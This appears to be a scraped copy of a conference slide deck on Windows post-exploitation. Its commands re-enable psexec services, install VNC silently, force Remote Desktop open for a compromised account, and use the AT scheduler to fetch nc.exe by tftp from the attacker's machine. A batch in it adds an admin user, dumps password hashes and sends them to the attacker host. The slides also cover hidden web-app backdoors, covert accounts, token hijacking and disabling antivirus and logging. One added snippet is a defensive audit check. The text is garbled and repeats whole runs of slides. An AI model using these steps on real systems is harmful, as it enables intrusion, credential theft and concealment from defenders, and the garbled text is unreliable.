– Anti-analysis / anti-forensics

• See all of OC's other talks
• Also Vinnie Liu's Metasploit research

Slide 35

Stealth Evading Detection

• Different Perspective
– DON'T BE AN ANOMALY
– Hide in plain sight

• Many tools have ONLY malicious uses
• Make your intent hard to determine

– Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

• Different Perspective
– Know the target's environment better than they do
• If they don't use encryption, maybe you shouldn't either
• Change strategies to match the environment's normal behavior

– Don't always default to exploits
• See Tactical Exploitation talk
• IDSs can't see normal behavior that is malicious

Slide 37

Stealth Evading Detection

• Using Windows security objects for stealth
– Auditing of Securable Objects is controlled by SACLs
– Null SACL = No Auditing = No Logs
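
An added example (not the authors' code) of checking for that condition from SDDL: classify each object's SACL as absent, null, empty, carrying audit ACEs that never fire, or active, and list the objects that will produce no audit record. The object names and SDDL strings are constructed; on a real host the SDDL would come from PowerShell's `(Get-Acl -Audit <path>).Sddl` or the GetSecurityInfo API.

```python
"""Find securable objects whose SACL produces no audit records: the
"Null SACL = No Auditing = No Logs" condition from the slide, read from SDDL.

Added example for this page, not the authors' code. The object names and SDDL
strings below are constructed; on a real host the SDDL of a file or key comes
from PowerShell's `(Get-Acl -Audit <path>).Sddl` or the GetSecurityInfo API.
"""
import re

# Top-level SDDL components: O: owner, G: group, D: DACL, S: SACL.
COMPONENT = re.compile(r"([OGDS]):((?:(?![OGDS]:).)*)")
ACE = re.compile(r"\(([^)]*)\)")
AUDIT_ACE_TYPES = {"AU", "OU", "XU"}     # audit, object audit, callback audit

# Constructed objects covering each way auditing can be silently absent.
SAMPLE_OBJECTS = {
    "secrets.txt (no SACL)": "O:BAG:SYD:(A;;FA;;;SY)(A;;FA;;;BA)",
    "payroll.xlsx (audited)": "O:BAG:SYD:(A;;FA;;;SY)(A;;FR;;;BU)S:(AU;SAFA;FA;;;WD)",
    "HKLM Run key (empty SACL)": "O:BAG:SYD:(A;;KA;;;SY)S:",
    "service.exe (audit ACE without SA/FA flags)": "O:BAG:SYD:(A;;FA;;;SY)S:(AU;;FA;;;WD)",
    "svchost (null SACL)": "O:BAG:SYD:(A;;FA;;;SY)S:NO_ACCESS_CONTROL",
}


def split_sddl(sddl):
    """'O:BAG:SYD:(...)S:(...)' -> {'O': 'BA', 'G': 'SY', 'D': '(...)', 'S': '(...)'}."""
    return dict(COMPONENT.findall(sddl))


def audit_status(sddl):
    """Classify the SACL of one object.

    Returns 'no-sacl', 'null-sacl', 'empty-sacl', 'no-audit-aces', or
    'audited:<sid>:<rights>:<success|failure|success+failure>,...'."""
    comps = split_sddl(sddl)
    if "S" not in comps:
        return "no-sacl"
    sacl = comps["S"]
    if sacl.startswith("NO_ACCESS_CONTROL"):
        return "null-sacl"
    aces = ACE.findall(sacl)
    if not aces:
        return "empty-sacl"
    active = []
    for ace in aces:
        fields = ace.split(";")
        if len(fields) < 6 or fields[0] not in AUDIT_ACE_TYPES:
            continue
        # SA = audit successful access, FA = audit failed access; an audit ACE
        # carrying neither flag never generates an event.
        when = [w for w, flag in (("success", "SA"), ("failure", "FA")) if flag in fields[1]]
        if when:
            active.append(f"{fields[5]}:{fields[2]}:{'+'.join(when)}")
    return ("audited:" + ",".join(active)) if active else "no-audit-aces"


def find_unaudited(objects):
    """Names of objects for which no audit ACE is in effect."""
    return sorted(name for name, sddl in objects.items()
                  if not audit_status(sddl).startswith("audited:"))


if __name__ == "__main__":
    for name, sddl in SAMPLE_OBJECTS.items():
        print(f"{name}: {audit_status(sddl)}")
```

Four of the five sample objects come back unaudited, and only one of those is the literal null SACL from the slide. The other three (no SACL component at all, an empty SACL, and an audit ACE with neither the SA nor the FA flag) are just as silent, so an audit-coverage check has to treat all of them as the "no logs" case rather than looking for the null ACL alone.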

Slide 38

• DEMOS
– Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else

– Use the credentials / access of another user
• Goals

– Change your identity at will
• User ID, domain credentials, sessions
• Impersonate system accounts
• Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
– Target users

• Who has access to what?
• Where is the data?

– Change Identity
• Hijack credentials / sessions
• Abuse tokens

– Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
– Incognito (metasploit)

• Enumerate / hijack tokens
– FU / FUTO

• Enable SYSTEM privileges
• Change process privileges (DKOM)

– SU, SUDO, KSU
– Process injection
– Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!

• What we want
– Privileges or SIDs

• What we get
– Access, Access, Access

• How we get it
– Incognito vs FUto

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities

• Goals
– Support all Post-Exploitation activities
– Disabling detection technologies
– Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature Modification is Basically Securable Object Manipulation
– Remember all those Tokens and Security Descriptors?
– These can be modified programmatically and directly

• Not just through existing tools
– Stealth / Persistence requirements

• May make it more advantageous to use custom tools
– Access Objects programmatically
– Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
– PsExec: It's still cool (Thanks Mark)

• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)

• Turning off or adding exceptions to security software
– Firewalls, AV, logging

• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
– Psexec was a great / awesome remote shell / command tool
– Everybody now disables clipbook, which psexec requires (l4m3)
– Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the system control tool sc.exe

– Net use \\target\ipc$ /user:username userpassword
– Sc \\target config netdde start= auto
– Sc \\target config netddedsdm start= auto
– Sc \\target config clipsrv start= auto
– Sc \\target start netdde
– Sc \\target start netddedsdm
– Sc \\target start clipserv

Slide 51

Feature Modification

• Enabling VNC (from command line)

– Go get VNC (check out guh.nu)
– Make a folder on the target for the vnc files
– Copy the following files to target folder

• Winvnc.exe
• Vnc.reg
• Vnchooks.dll
• Omnithread_rt.dll

– Regedit -s vnc.reg
– Winvnc -install
– Net start "vnc server"
– Winvnc
– Password is "infected"

Vnc.reg file contents

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app

• Ex: System controlling access to security doors
– No command line way of modifying system, need GUI

• SCADA systems
• Security cameras
• Who knows what you might be up to

– Remote desktop is fast and already a feature of OS
– However it's often disabled, maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 26: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 27: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

• Existing tools
  – Incognito (Metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!

• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs. FUTo

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities

• Goals
  – Support all Post-Exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature Modification is basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly

• Not just through existing tools
  – Stealth / Persistence requirements

• May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: It's still cool (Thanks Mark)

• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)

• Turning off or adding exceptions to security software
  – Firewalls, AV, logging

• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
  – PsExec was a great, awesome remote shell/command tool
  – Everybody now disables ClipBook, which psexec requires (l4m3)
  – Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool, sc.exe
  – net use \\target\ipc$ /user:username userpassword
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv

Slide 51

Feature Modification
• Enabling VNC (from command line)
  – Go get VNC (check out guhnu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit /s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents (regedit requires the version header line):

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
  "SocketConnect"=dword:00000001
  "AutoPortSelect"=dword:00000001
  "InputsEnabled"=dword:00000001
  "LocalInputsDisabled"=dword:00000000
  "IdleTimeout"=dword:00000000
  "QuerySetting"=dword:00000002
  "QueryTimeout"=dword:0000000a
  "PollUnderCursor"=dword:00000000
  "PollForeground"=dword:00000001
  "PollFullScreen"=dword:00000000
  "OnlyPollConsole"=dword:00000001
  "OnlyPollOnEvent"=dword:00000000
  "Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: a system controlling access to security doors
      – No command-line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote desktop is fast and already a feature of the OS
  – However, it's often disabled, maybe even by GPO

Slide 53

Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

  [Unicode]
  Unicode=yes
  [Version]
  signature="$CHICAGO$"
  Revision=1
  [Privilege Rights]
  seremoteinteractivelogonright = hacked_account
  seinteractivelogonright = hacked_account
  sedenyinteractivelogonright =
  sedenyremoteinteractivelogonright =
  sedenynetworklogonright =

  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
  "fDenyTSConnections"=dword:00000000
  "TSEnabled"=dword:00000001
  "TSUserEnabled"=dword:00000000

  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems

• Remember, this is POST exploitation, so you already have some access

• The AT command schedules things to run at a specified time and date
  – The Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – ClipBook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

  net use \\target\ipc$ password /user:username
  at \\target 12:00 pm command
  Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not

• AT is as good as having a shell
  – Enable / Start Services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM

Slide 60

